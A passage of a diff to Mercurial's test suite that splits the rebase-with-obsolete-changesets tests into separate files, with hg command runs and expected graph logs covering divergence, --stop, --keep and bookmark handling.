17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a 
G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - Skip obsolete changeset even with multiple hops ----------------------------------------------- @@ -948,7 +222,7 @@ $ hg rebase -s 10 -d 12 abort: this rebase will cause divergences from: 121d9e3bc4c6 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg log -G @ 14:73568ab6879d bar foo | @@ -1044,1097 +318,24 @@ rebasing 21:7bdc8a87673d tip "dummy change" $ cd .. -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. 
- - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. 
- - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G 
-r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" - $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c - | - | * 4:76be324c128b d - | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ cd .. 
- -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" +Can rebase pruned and rewritten commits with --keep - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ + $ hg init keep + $ cd keep + $ hg debugdrawdag <<'EOS' + > D + > | + > C + > | + > F B E # prune: B + > \|/ # rebase: C -> E > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. 
- -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. 
- - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . 
# working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A > EOS 1 new orphan changesets - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, 
rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. 
- $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF + $ hg rebase -b D -d F --keep + rebasing 1:112478962961 B "B" + rebasing 4:26805aba1e60 C "C" + rebasing 5:f585351a92f8 D tip "D" - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - 
rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 
--collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [255] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== $ cd .. 
- $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete3.t copy from tests/test-rebase-obsolete.t copy to tests/test-rebase-obsolete3.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete3.t @@ -18,1032 +18,6 @@ > strip= > EOF -Setup rebase canonical repo - - $ hg init base - $ cd base - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 
drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up tip - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg log -G - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - | o 3:32af7686d403 D - | | - | o 2:5fddd98957c8 C - | | - | o 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ cd .. - -simple rebase ---------------------------------- - - $ hg clone base simple - updating to branch default - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ cd simple - $ hg up 32af7686d403 - 3 files updated, 0 files merged, 2 files removed, 0 files unresolved - $ hg rebase -d eea13746799a - rebasing 1:42ccdea3bb16 "B" - rebasing 2:5fddd98957c8 "C" - rebasing 3:32af7686d403 "D" - $ hg log -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ hg log --hidden -G - @ 10:8eeb3c33ad33 D - | - o 9:2327fea05063 C - | - o 8:e4e5be0395b2 B - | - | o 7:02de42196ebe H - | | - o | 6:eea13746799a G - |\| - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - | x 3:32af7686d403 D (rewritten using rebase as 10:8eeb3c33ad33) - | | - | x 